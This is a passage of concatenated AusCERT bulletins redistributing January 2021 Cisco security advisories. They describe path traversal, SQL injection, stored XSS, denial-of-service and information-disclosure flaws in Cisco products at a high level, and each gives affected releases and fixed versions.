https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected the following Cisco
products if they were running a release of Cisco StarOS earlier than
Release 21.22.0 and had the Vector Packet Processing (VPP) feature enabled:
ASR 5000 Series Aggregation Services Routers
Virtualized Packet Core-Single Instance (VPC-SI)
The VPP feature is disabled by default.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Determine the VPP Configuration
To see if the VPP feature is enabled, use the show task table process
vpp_main all command. If the command output lists the vpp_main process, the
feature is enabled. The following is a sample output with the VPP feature
enabled:
[local]swch# show task table process vpp_main all
task parent
cpu facility inst pid pri node facility inst pid
---- ---------------------------------------------- -------------------------
1/0 vpp_main 1005729 5729 0 all - 0 0
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco StarOS releases 21.22.0 and later
contained the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkj+ONLKJtyKPYoAQh0ORAAm9ixdv7Uqkg0tCmHAyHwS/QqOegVL6qc
/wgT6zLp2mDjf7bPero8vZutsQYXl9+BneLd9GJ4/8J912Hqg+A/TaXfyzc56+lT
OmrRPtzR8f6zvtzudXGnTP/aEJdnOTFCvWXIWRaUy3aG4uPtXnJohPsjyyZ3WW6J
uRDgZTHtCZdZqvmORZjjaVqvRqkd76MRYsKNziD79IclIsmzWk74G49P0oCZSM35
BqKdzpobxWXCeMd2OQE7z/bap0X5CTmMOFEsltOqPMNDEx16xYHim6vwKg+Fw13M
BSTObzfuu36bdqGqi0B9HuUMFuM+sFMYJ/7KoLcU1SI6o7kilAtLzYAuJrcf78z9
yFuptFB1vXQARM9pPPrwBgQfGxUuvbEwa1vFoDOm892L0BrTqvmt/1L9U/0yzpC+
FgJ4St2P9UcUz6bVvd1Ffd9I1jnta/mCAAWtftjiin+SRJUTQqqyJKpFUpYGxz9N
oDFXVIbf67xxiK0BGbVKcKZq26VIkTpELymJGWIkHLHw1bhwLEQCTVk5YRtqdGLE
h8oUS5B6CFApE91px1AtDA8+0+V/53w/aKfYusr6Aygv+hMBVRvvdFft1dgOnJ7j
dRxGvZRuPEIYojYPShtbCkGpXMVkE9r58vJTnzjqFHvhhWgz4fdqH+GKNGQ5Lmia
MbEQfIS6OVo=
=LZso
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0252
Cisco Unified Communications Products Vulnerabilities
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Unified Communications Products
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Access Confidential Data -- Existing Account
Reduced Security -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1364 CVE-2021-1357 CVE-2021-1355
CVE-2021-1282
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Unified Communications Products Vulnerabilities
Priority: Medium
Advisory ID: cisco-sa-imp-trav-inj-dM687ZD6
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv20974 CSCvv20985 CSCvv62642 CSCvv62648
CVE Names: CVE-2021-1282 CVE-2021-1355 CVE-2021-1357 CVE-2021-1364
CWEs: CWE-35 CWE-89
Summary
o Multiple vulnerabilities in Cisco Unified Communications Manager IM &
Presence Service (Unified CM IM&P) could allow an attacker to conduct path
traversal attacks and SQL injection attacks on an affected system. One of
the SQL injection vulnerabilities that affects Unified CM IM&P also affects
Cisco Unified Communications Manager (Unified CM) and Cisco Unified
Communications Manager Session Management Edition (Unified CM SME) and
could allow an attacker to conduct SQL injection attacks on an affected
system.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6
Affected Products
o Vulnerable Products
At the time of publication, these vulnerabilities affected the following
Cisco products:
Unified CM
Unified CM IM&P
Unified CM SME
For information about which Cisco software releases are vulnerable, see the
Fixed Software section of this advisory. See the Details section in the bug
ID(s) at the top of this advisory for the most complete and current
information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Details
o The vulnerabilities are not dependent on one another. Exploitation of one
of the vulnerabilities is not required to exploit another vulnerability. In
addition, a software release that is affected by one of the vulnerabilities
may not be affected by the other vulnerabilities.
Details about the vulnerabilities are as follows.
CVE-2021-1357: Cisco Unified Communications Manager IM & Presence Service
Path Traversal Vulnerability
A vulnerability in the web-based management interface of Cisco Unified CM
IM&P could allow an authenticated, remote attacker to conduct path
traversal attacks and obtain read access to sensitive files on an affected
system.
The vulnerability exists because the web-based management interface does
not properly validate user-supplied input. An attacker could exploit this
vulnerability by sending a crafted HTTP request that contains directory
traversal character sequences to an affected system. A successful exploit
could allow the attacker to read files on the underlying operating system.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv20985
CVE ID: CVE-2021-1357
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVE-2021-1355: Cisco Unified Communications Manager IM & Presence Service
SQL Injection Vulnerability
A vulnerability in the web-based management interface of Cisco Unified CM
IM&P could allow an authenticated, remote attacker to conduct SQL injection
attacks on an affected system.
The vulnerability is due to improper validation of user-submitted
parameters. An attacker could exploit this vulnerability by authenticating
to the application and sending malicious requests to an affected system. A
successful exploit could allow the attacker to obtain data that is stored
in the underlying database, including hashed user credentials.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv20974
CVE ID: CVE-2021-1355
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVE-2021-1364: Cisco Unified Communications Manager IM & Presence Service
SQL Injection Vulnerability
A vulnerability in the web-based management interface of Cisco Unified CM
IM&P could allow an authenticated, remote attacker with administrative
credentials to conduct SQL injection attacks on an affected system.
The vulnerability is due to improper validation of user-submitted
parameters. An attacker could exploit this vulnerability by authenticating
to the application and sending malicious requests to an affected system. A
successful exploit could allow the attacker to obtain data that is stored
in the underlying database.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv62648
CVE ID: CVE-2021-1364
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
CVE-2021-1282: Cisco Unified Communications Manager SQL Injection
Vulnerability
A vulnerability in the web-based management interface of Cisco Unified CM
and Cisco Unified CM SME could allow an authenticated, remote attacker with
administrative credentials to conduct SQL injection attacks on an affected
system.
The vulnerability is due to improper validation of user-submitted
parameters. An attacker could exploit this vulnerability by authenticating
to the application and sending malicious requests to an affected system. A
successful exploit could allow the attacker to obtain data that is stored
in the underlying database.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv62642
CVE ID: CVE-2021-1364
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, the release information in the following table
(s) was accurate. See the Details section in the bug ID(s) at the top of
this advisory for the most complete and current information.
The left column lists Cisco software releases, and the right column
indicates whether a release was affected by the vulnerabilities described
in this advisory and which release included the fix for these
vulnerabilities.
Unified IM&P
Cisco Unified Communications Manager IM & First Fixed Release for These
Presence Service Releases Vulnerabilities
Earlier than 10.5 Migrate to a fixed release.
10.5 Migrate to a fixed release.
11.0 Migrate to a fixed release.
11.5 11.5(1)SU9
12.0 Migrate to a fixed release.
12.5 12.5(1)SU4 (March 2021)
Unified CM and Unified CM SME
Cisco Unified Communications Manager and Cisco First Fixed Release for
Unified Communications Manager SME Releases These Vulnerabilities
Earlier than 10.5 Migrate to a fixed
release.
10.5 Migrate to a fixed
release.
11.0 Migrate to a fixed
release.
11.5 11.5(1)SU9
12.0 12.0(1)SU4
12.5 12.5(1)SU4 (March 2021)
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o Cisco would like to thank Mostafa Soliman of IBM X-Force Red for reporting
these vulnerabilities.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkjseNLKJtyKPYoAQjHGg/+PMfLepXx1R6of2TkqccQdGtBFeZUl+M+
VB3nXaFgC+oEdLtdH/x5XESUyuTMqfuxEpDzn7AmYROeXZxbsOp+x+s9xXHIS27m
bgDxpBVlW9P+QNB7xVWyMDb93QzhDXfuxpX90Wk7HZ7r4kgdVrDBqTJ2XqLXTChm
pNCwErLoXRF8NCe8i4R8X/O9jbtba1cYKvmSYNpNHVGlORygDF5ykXGIBlhSF6pN
3iFcSVEiVBiEFpAFYpNpn45D//aNc1pqSqXHAkGWSkGu+GB5XTrWafc3LbJUirav
UDPInP5wChiM890TmjT0c+NHIRvdDP/pdHxBP/f0OJBzNanxc83z20jthL1tat8t
9WCyGbqKJMJjduCTF3vtJAwh9WVj19TBKVqy8qc6W5dOJLow+jrdBSwcUgoz9YZI
K0yi3rjYKFhNj6oUYcSAlk0LT5Cx4xGE0csDU6THNB9zc8Zv/NxOipuOGLqvwG1K
MOUKi5tndPNX4+HDDuQ0Obdo6WF9+r0NVWR7uFgESZgn5ziCPDtpjsv1mTyOCdjX
4iNlHJtY+RbmlYVMWs90s63JtxBg5RbTXZH/eH4gmrqIP6ur5h5smDHZLJLyKG25
Fa75NZ4iP42oFEwrZlt9yLcVajM/ASZ9Lb2xLvZe+eQxTsR98rM4a4bJTs4eDPCx
z2vx7Q1Ev/4=
=fSNG
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0251
Cisco Umbrella Dashboard Packet Flood Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Umbrella Dashboard
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Reduced Security -- Remote/Unauthenticated
Resolution: None
CVE Names: CVE-2021-1350
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Umbrella Dashboard Packet Flood Vulnerability
Priority: Medium
Advisory ID: cisco-sa-umb-dos-dgKzDEBP
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvw61612
CVE Names: CVE-2021-1350
CWEs: CWE-770
Summary
o A vulnerability in the web UI of Cisco Umbrella could allow an
unauthenticated, remote attacker to negatively affect the performance of
this service.
The vulnerability exists due to insufficient rate limiting controls in the
web UI. An attacker could exploit this vulnerability by sending crafted
HTTPS packets at a high and sustained rate. A successful exploit could
allow the attacker to negatively affect the performance of the web UI.
Cisco has addressed this vulnerability. There are no workarounds that
address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP
Affected Products
o Vulnerable Products
This vulnerability affects Cisco Umbrella, which is cloud based. No user
action is required.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o Cisco has addressed this vulnerability in Cisco Umbrella Dashboard, which
is cloud based. No user action is required.
Customers who need additional information are advised to contact Cisco
Umbrella Support at umbrella-support@cisco.com or their contracted
maintenance providers.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o Cisco would like to thank Abhinav Khanna of eSec Forte Technologies for
reporting this vulnerability.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkjj+NLKJtyKPYoAQglGg/6Am9lNh5z6SJP3trEaAsjJFwVkL6sYJvm
GhOreEkjq5pMzmQwy8x8vv46k2kgcqLskeC87pRsLV+hpumstkr7ZvvpldS9h/qR
RHRoh1y8+KyBF1T2JvHfqPLXlq1yq8uJTNv20JPBDjSscmO3a2hHQvzHTtDHTsmT
FLj4ZDdPitdgCZJwLyjbQHd5gosxWWSaImN+9HR7NKl0/RILmEXGfOH+SLMt52/d
lI+Wy2DEdCkJPKbkD5FwvhjarcvkAbe9yLbkkQWg+MD7J87Hw7BIs4HrhA/mYa1k
KcoJZuRZraFU7yP3G5fZ9KZSEBX4I4F3AxG/WhDvZTjxlrhzJ8RC4oQgnxgQ1sMl
mlo12c/1E/ZIWN7E3YWaWjTDRMEKvenXFIiZbp9lbY5h8MPYZKAcskzbffZ1R3mT
3cvgFhRr6WmVESPR3k6mlePYbAnOv1nmrMIuaRgAodEgH590LYGS4dRIyKAKvIas
OZwraKA0FnLGzo718Y5hBNDYlvQDA3h1jIGsh6ZtYWAzBhtYtk4BjwX89F2rZ9e/
HDWJOgqZ+hbhSu4UjPePiyQRJVClwh6zObLT2+gLoMZ3p8GXfAHduIv+SKE7FsGn
fth/F1jRnIoYIOsQuEulj8PScIetmfgmBWJb3P7VvuREzV5/zNmhV/Cfx1IzGRas
zPlluMtUFCM=
=tKD5
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0250
Cisco Web Security Appliance Stored Cross-Site Scripting Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Web Security Appliance
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Cross-site Scripting -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1271
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Web Security Appliance Stored Cross-Site Scripting Vulnerability
Priority: Medium
Advisory ID: cisco-sa-wsa-xss-RuB5WGqL
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvu22019 CSCvv27761
CVE Names: CVE-2021-1271
CWEs: CWE-79
Summary
o A vulnerability in the web-based management interface of Cisco AsyncOS for
Cisco Web Security Appliance (WSA) could allow an authenticated, remote
attacker to conduct a stored cross-site scripting (XSS) attack against a
user of the interface of an affected device.
The vulnerability exists because the web-based management interface does
not properly validate user-supplied input. An attacker could exploit this
vulnerability by inserting malicious data into a specific data field in an
affected interface. A successful exploit could allow the attacker to
execute arbitrary script code in the context of the affected interface.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco WSA releases
earlier than Release 12.5.1.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco WSA releases 12.5.1 and later contained
the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found by Alvaro Gutierrez of Cisco during internal
security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
Related to This Advisory
o Cross-Site Scripting
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkjcONLKJtyKPYoAQhFKA/+NivaZklBfTmTP9kxDpHL9uecDlCRXbwN
4a8g26Dkcg5ZFpj2fmJT2TvbzIvqJ1d0aOk4IMmbBYE3bMLAlrkK+Rt8XMQVXxVS
+K8h18dNOmMLKV9dzqXMehU42v8cRy0rxJlArA8/1kNskyIJmRnqSuq5Od2sCp0L
Q0+FRUOQc/fzQEQxA6x+ocJxGv0Zbja9mYdB5KWuWH85WbRGCp5Gf6iPpuFpB11P
lh5xGsgj9MQTOVZnibv+9THAvq5BTNWRReqA55NhXYrn0eOTGLTDLIhG79TA/gp7
40ZXwV+zVAlTJfDAho1eZfzqb923Unhfievt4Nr0xplAvtwCySA6re1nsuXH+kfk
CShofeHpeWbBX9VlrGVXFBL50mXLde4GuhoJ39VX7q2PUu9OA4lBW1RgMRQ+f9qP
i2YWERe6l2N+WEKGL71ijZir0Aho6guckMjPeGLKqeBcvOHMDJdRRMaJUq08RDZc
w0bWXubkatoj0sz5n5fm/Q6nhjq8mtTJiS4ffc2yIy8OYil/0IdQN2hvg9X/yzWK
pOgbawFW/vO5Hz6QX2SqZKWqq+78cx7gOM8mYSkBhZU48tEDAy+Mnd5w8p6uFFW2
qbQgQp9Fd72BT+V092rVn7vFP/CvoqM/NtSjyDq/FPF5mZHIfwnEbX4CyEqOe9ke
5Xr4LvT17To=
=Dx6C
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0249
Cisco Email Security Appliance, Cisco Content Security Management
Appliance, and Cisco Web Security Appliance Information
Disclosure Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Email Security Appliance (ESA)
Cisco Content Security Management Appliance (SMA)
Cisco Web Security Appliance (WSA)
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Access Confidential Data -- Remote/Unauthenticated
Unauthorised Access -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1129
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Email Security Appliance, Cisco Content Security Management Appliance,
and Cisco Web Security Appliance Information Disclosure Vulnerability
Priority: Medium
Advisory ID: cisco-sa-esa-wsa-sma-info-RHp44vAC
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvu89555 CSCvu93199 CSCvu93201
CVE Names: CVE-2021-1129
CWEs: CWE-201
Summary
o A vulnerability in the authentication for the general purpose APIs
implementation of Cisco Email Security Appliance (ESA), Cisco Content
Security Management Appliance (SMA), and Cisco Web Security Appliance (WSA)
could allow an unauthenticated, remote attacker to access general system
information and certain configuration information from an affected device.
The vulnerability exists because a secure authentication token is not
required when authenticating to the general purpose API. An attacker could
exploit this vulnerability by sending a crafted request for information to
the general purpose API on an affected device. A successful exploit could
allow the attacker to obtain system and configuration information from the
affected device, resulting in an unauthorized information disclosure.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco ESA, Cisco
SMA, and Cisco WSA if they supported general purpose API and the release
was earlier than the first fixed release.
The general purpose API was first supported in the following Cisco software
releases:
ESA Release 13.0
SMA Release 12.5
WSA Release 11.8
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Details
o The general purpose API and the information obtained by this API are
described in the General Purpose APIs chapter of the AsyncOS 13.0 API for
Cisco Email Security Appliances Getting Started Guide .
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, the following Cisco software releases contained
the fix for this vulnerability:
ESA releases 13.5.2 and later
SMA releases 13.8.0 and later
WSA releases 12.5.1 and later
